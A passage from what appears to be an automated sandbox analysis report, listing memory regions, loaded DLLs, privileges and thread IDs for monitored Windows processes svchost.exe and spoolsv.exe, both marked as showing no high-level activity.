| private_0x00000086e91e0000 | 0x86e91e0000 | 0x86e92dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e93e0000 | 0x86e93e0000 | 0x86e94dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e9500000 | 0x86e9500000 | 0x86e95fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e9600000 | 0x86e9600000 | 0x86e96fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e9e00000 | 0x86e9e00000 | 0x86e9efffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086e9f00000 | 0x86e9f00000 | 0x86e9ffffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea000000 | 0x86ea000000 | 0x86ea0fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea100000 | 0x86ea100000 | 0x86ea1fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea200000 | 0x86ea200000 | 0x86ea2fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea300000 | 0x86ea300000 | 0x86ea3fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea400000 | 0x86ea400000 | 0x86ea4fffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x86ea500000 | 0x86ea5defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000086ea5e0000 | 0x86ea5e0000 | 0x86ea6dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea6e0000 | 0x86ea6e0000 | 0x86ea7dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea7e0000 | 0x86ea7e0000 | 0x86ea8dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086ea900000 | 0x86ea900000 | 0x86ea9fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086eaa00000 | 0x86eaa00000 | 0x86eaafffff | Private Memory | rw |
|
|
|
- |
| private_0x00000086eab00000 | 0x86eab00000 | 0x86eabfffff | Private Memory | rw |
|
|
|
- |
| ~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat | 0x86eac00000 | 0x86eb3fffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00007df5ff5e0000 | 0x7df5ff5e0000 | 0x7ff5ff5dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff673338000 | 0x7ff673338000 | 0x7ff673339fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67333a000 | 0x7ff67333a000 | 0x7ff67333bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67333c000 | 0x7ff67333c000 | 0x7ff67333dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67333e000 | 0x7ff67333e000 | 0x7ff67333ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673340000 | 0x7ff673340000 | 0x7ff673341fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673342000 | 0x7ff673342000 | 0x7ff673343fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673344000 | 0x7ff673344000 | 0x7ff673345fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673346000 | 0x7ff673346000 | 0x7ff673347fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673348000 | 0x7ff673348000 | 0x7ff673349fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67334a000 | 0x7ff67334a000 | 0x7ff67334bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67334c000 | 0x7ff67334c000 | 0x7ff67334dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67334e000 | 0x7ff67334e000 | 0x7ff67334ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673350000 | 0x7ff673350000 | 0x7ff673351fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673352000 | 0x7ff673352000 | 0x7ff673353fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673354000 | 0x7ff673354000 | 0x7ff673355fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673356000 | 0x7ff673356000 | 0x7ff673357fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673358000 | 0x7ff673358000 | 0x7ff673359fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67335a000 | 0x7ff67335a000 | 0x7ff67335bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67335c000 | 0x7ff67335c000 | 0x7ff67335dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67335e000 | 0x7ff67335e000 | 0x7ff67335ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff673360000 | 0x7ff673360000 | 0x7ff67345ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff673460000 | 0x7ff673460000 | 0x7ff673482fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff673483000 | 0x7ff673483000 | 0x7ff673484fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673485000 | 0x7ff673485000 | 0x7ff673486fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673487000 | 0x7ff673487000 | 0x7ff673488fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673489000 | 0x7ff673489000 | 0x7ff67348afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67348b000 | 0x7ff67348b000 | 0x7ff67348bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67348e000 | 0x7ff67348e000 | 0x7ff67348ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| bitsproxy.dll | 0x7ff8dca80000 | 0x7ff8dca91fff | Memory Mapped File | rwx |
|
|
|
- |
| bluetoothapis.dll | 0x7ff8e09f0000 | 0x7ff8e0a0dfff | Memory Mapped File | rwx |
|
|
|
- |
| bthtelemetry.dll | 0x7ff8e0a10000 | 0x7ff8e0a1cfff | Memory Mapped File | rwx |
|
|
|
- |
| bthradiomedia.dll | 0x7ff8e0a20000 | 0x7ff8e0a37fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanradiomanager.dll | 0x7ff8e0a40000 | 0x7ff8e0a53fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ff8e0f70000 | 0x7ff8e0f7dfff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ff8e15f0000 | 0x7ff8e164efff | Memory Mapped File | rwx |
|
|
|
- |
| netprofmsvc.dll | 0x7ff8e1870000 | 0x7ff8e18fcfff | Memory Mapped File | rwx |
|
|
|
- |
| perftrack.dll | 0x7ff8e25d0000 | 0x7ff8e25e7fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ff8e2ea0000 | 0x7ff8e2ea9fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ff8e5520000 | 0x7ff8e553cfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ff8e5dd0000 | 0x7ff8e5ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ff8e6330000 | 0x7ff8e6365fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ff8e7280000 | 0x7ff8e7299fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ff8e72a0000 | 0x7ff8e72b5fff | Memory Mapped File | rwx |
|
|
|
- |
| nsisvc.dll | 0x7ff8e7420000 | 0x7ff8e742bfff | Memory Mapped File | rwx |
|
|
|
- |
| fontprovider.dll | 0x7ff8e77d0000 | 0x7ff8e77f8fff | Memory Mapped File | rwx |
|
|
|
- |
| fntcache.dll | 0x7ff8e7800000 | 0x7ff8e79a3fff | Memory Mapped File | rwx |
|
|
|
- |
| es.dll | 0x7ff8e7f00000 | 0x7ff8e7f79fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ff8e8460000 | 0x7ff8e846afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ff8e8480000 | 0x7ff8e84b7fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ff8e84e0000 | 0x7ff8e84f7fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ff8ea3c0000 | 0x7ff8ea467fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ff8eac70000 | 0x7ff8ead07fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #71: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #71 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k NetworkService |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2a0 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
880
0x
84
0x
CE8
0x
708
0x
718
0x
980
0x
918
0x
68C
0x
688
0x
680
0x
674
0x
668
0x
614
0x
5E0
0x
590
0x
488
0x
470
0x
468
0x
464
0x
460
0x
458
0x
3EC
0x
38C
0x
2C4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000005400000000 | 0x5400000000 | 0x540fffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005410000000 | 0x5410000000 | 0x541fffffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005458fb0000 | 0x5458fb0000 | 0x5458fbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x5458fc0000 | 0x5458fc0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005458fd0000 | 0x5458fd0000 | 0x5458fe3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005458ff0000 | 0x5458ff0000 | 0x545906ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005459070000 | 0x5459070000 | 0x5459073fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005459080000 | 0x5459080000 | 0x5459080fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005459090000 | 0x5459090000 | 0x5459091fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x54590a0000 | 0x545915dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005459160000 | 0x5459160000 | 0x5459160fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459170000 | 0x5459170000 | 0x5459170fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005459180000 | 0x5459180000 | 0x5459180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005459190000 | 0x5459190000 | 0x5459190fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000054591a0000 | 0x54591a0000 | 0x54591a6fff | Private Memory | rw |
|
|
|
- |
| vsstrace.dll.mui | 0x54591b0000 | 0x54591b8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000054591c0000 | 0x54591c0000 | 0x54591c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000054591d0000 | 0x54591d0000 | 0x54591d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000054591e0000 | 0x54591e0000 | 0x54591e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000054591f0000 | 0x54591f0000 | 0x54591f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459200000 | 0x5459200000 | 0x54592fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005459380000 | 0x5459380000 | 0x545943ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005459440000 | 0x5459440000 | 0x5459440fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459450000 | 0x5459450000 | 0x5459450fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459460000 | 0x5459460000 | 0x5459466fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459470000 | 0x5459470000 | 0x54594effff | Private Memory | rw |
|
|
|
- |
| private_0x00000054594f0000 | 0x54594f0000 | 0x54594f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459500000 | 0x5459500000 | 0x54595fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005459600000 | 0x5459600000 | 0x5459787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005459790000 | 0x5459790000 | 0x5459910fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005459a20000 | 0x5459a20000 | 0x5459b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459b20000 | 0x5459b20000 | 0x5459c1ffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x5459c20000 | 0x5459c2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x5459c30000 | 0x5459c3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x5459c40000 | 0x5459c4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x5459c50000 | 0x5459c5ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x5459c60000 | 0x5459c6ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x5459c70000 | 0x5459c7ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005459d20000 | 0x5459d20000 | 0x5459e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459e20000 | 0x5459e20000 | 0x5459f1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005459f20000 | 0x5459f20000 | 0x545a01ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a020000 | 0x545a020000 | 0x545a11ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a120000 | 0x545a120000 | 0x545a21ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a220000 | 0x545a220000 | 0x545a31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a320000 | 0x545a320000 | 0x545a41ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a420000 | 0x545a420000 | 0x545a51ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x545a520000 | 0x545a856fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545a860000 | 0x545a860000 | 0x545a95ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545a960000 | 0x545a960000 | 0x545aa5ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545aa60000 | 0x545aa60000 | 0x545aadffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545aae0000 | 0x545aae0000 | 0x545aae1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545aaf0000 | 0x545aaf0000 | 0x545aaf0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545ab00000 | 0x545ab00000 | 0x545ab00fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545ab10000 | 0x545ab10000 | 0x545ab16fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545ab20000 | 0x545ab20000 | 0x545abe1fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545abf0000 | 0x545abfffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545ac00000 | 0x545ac00000 | 0x545acfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545ad00000 | 0x545ad00000 | 0x545adfffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545ae00000 | 0x545ae0ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ae10000 | 0x545ae1ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ae20000 | 0x545ae2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ae30000 | 0x545ae3ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545ae40000 | 0x545ae40000 | 0x545ae46fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000545ae50000 | 0x545ae50000 | 0x545ae5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545ae60000 | 0x545ae60000 | 0x545ae6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545ae70000 | 0x545ae70000 | 0x545ae7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545ae80000 | 0x545ae80000 | 0x545ae8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545ae90000 | 0x545ae90000 | 0x545ae9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545aea0000 | 0x545aea0000 | 0x545aeaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| catdb | 0x545aeb0000 | 0x545aebffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545aec0000 | 0x545aecffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545aed0000 | 0x545aedffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545aee0000 | 0x545aeeffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545aef0000 | 0x545aefffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545af00000 | 0x545af00000 | 0x545affffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b000000 | 0x545b000000 | 0x545b0fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000545b100000 | 0x545b100000 | 0x545b10ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545b110000 | 0x545b110000 | 0x545b11ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545b120000 | 0x545b120000 | 0x545b12ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545b130000 | 0x545b130000 | 0x545b13ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545b140000 | 0x545b140000 | 0x545b14ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000545b150000 | 0x545b150000 | 0x545b15ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| catdb | 0x545b160000 | 0x545b16ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b170000 | 0x545b17ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b180000 | 0x545b18ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b190000 | 0x545b19ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b1a0000 | 0x545b1affff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b1b0000 | 0x545b1bffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545b1c0000 | 0x545b1c0000 | 0x545b1c0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b1d0000 | 0x545b1d0000 | 0x545b1d6fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545b1e0000 | 0x545b1effff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545b1f0000 | 0x545b1fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545b200000 | 0x545b200000 | 0x545b2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b300000 | 0x545b300000 | 0x545b3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b400000 | 0x545b400000 | 0x545b4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b500000 | 0x545b500000 | 0x545b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b600000 | 0x545b600000 | 0x545b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b700000 | 0x545b700000 | 0x545b7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b800000 | 0x545b800000 | 0x545b8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545b900000 | 0x545b900000 | 0x545b9fffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545ba00000 | 0x545ba0ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545ba10000 | 0x545ba10000 | 0x545ba10fff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545ba20000 | 0x545ba2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ba30000 | 0x545ba3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ba40000 | 0x545ba4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x545ba50000 | 0x545ba5ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545ba60000 | 0x545ba60000 | 0x545ba66fff | Private Memory | rw |
|
|
|
- |
| private_0x000000545ba70000 | 0x545ba70000 | 0x545baeffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x545baf0000 | 0x545bafffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000545bb00000 | 0x545bb00000 | 0x545bbfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545bc00000 | 0x545bc00000 | 0x545bcfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545bd00000 | 0x545bd00000 | 0x545bdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545be00000 | 0x545be00000 | 0x545befffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545bf00000 | 0x545bf00000 | 0x545bffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545c000000 | 0x545c000000 | 0x545cffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545d000000 | 0x545d000000 | 0x545d20ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000545d210000 | 0x545d210000 | 0x546d20ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000546d210000 | 0x546d210000 | 0x547d20ffff | Private Memory | rw |
|
|
|
- |
| catdb | 0x547d210000 | 0x547d21ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d220000 | 0x547d22ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d230000 | 0x547d23ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d240000 | 0x547d24ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d250000 | 0x547d25ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d260000 | 0x547d26ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d270000 | 0x547d27ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d280000 | 0x547d28ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d290000 | 0x547d29ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2a0000 | 0x547d2affff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2b0000 | 0x547d2bffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2c0000 | 0x547d2cffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2d0000 | 0x547d2dffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2e0000 | 0x547d2effff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d2f0000 | 0x547d2fffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d300000 | 0x547d30ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0x547d310000 | 0x547d31ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff980000 | 0x7df5ff980000 | 0x7ff5ff97ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6733b6000 | 0x7ff6733b6000 | 0x7ff6733b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733ba000 | 0x7ff6733ba000 | 0x7ff6733bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733bc000 | 0x7ff6733bc000 | 0x7ff6733bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733be000 | 0x7ff6733be000 | 0x7ff6733bffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733c0000 | 0x7ff6733c0000 | 0x7ff6733c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733c2000 | 0x7ff6733c2000 | 0x7ff6733c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733c4000 | 0x7ff6733c4000 | 0x7ff6733c5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733c6000 | 0x7ff6733c6000 | 0x7ff6733c7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733c8000 | 0x7ff6733c8000 | 0x7ff6733c9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733ca000 | 0x7ff6733ca000 | 0x7ff6733cbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733cc000 | 0x7ff6733cc000 | 0x7ff6733cdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733ce000 | 0x7ff6733ce000 | 0x7ff6733cffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6733d2000 | 0x7ff6733d2000 | 0x7ff6733d3fff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 79 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #72: spoolsv.exe
0
0
| Information | Value |
|---|---|
| ID | #72 |
| File Name | c:\windows\system32\spoolsv.exe |
| Command Line | C:\Windows\System32\spoolsv.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x230 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
9AC
0x
BCC
0x
BF8
0x
A04
0x
56C
0x
610
0x
C2C
0x
318
0x
87C
0x
894
0x
47C
0x
414
0x
40C
0x
2F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008c6fff | Private Memory | rw |
|
|
|
- |
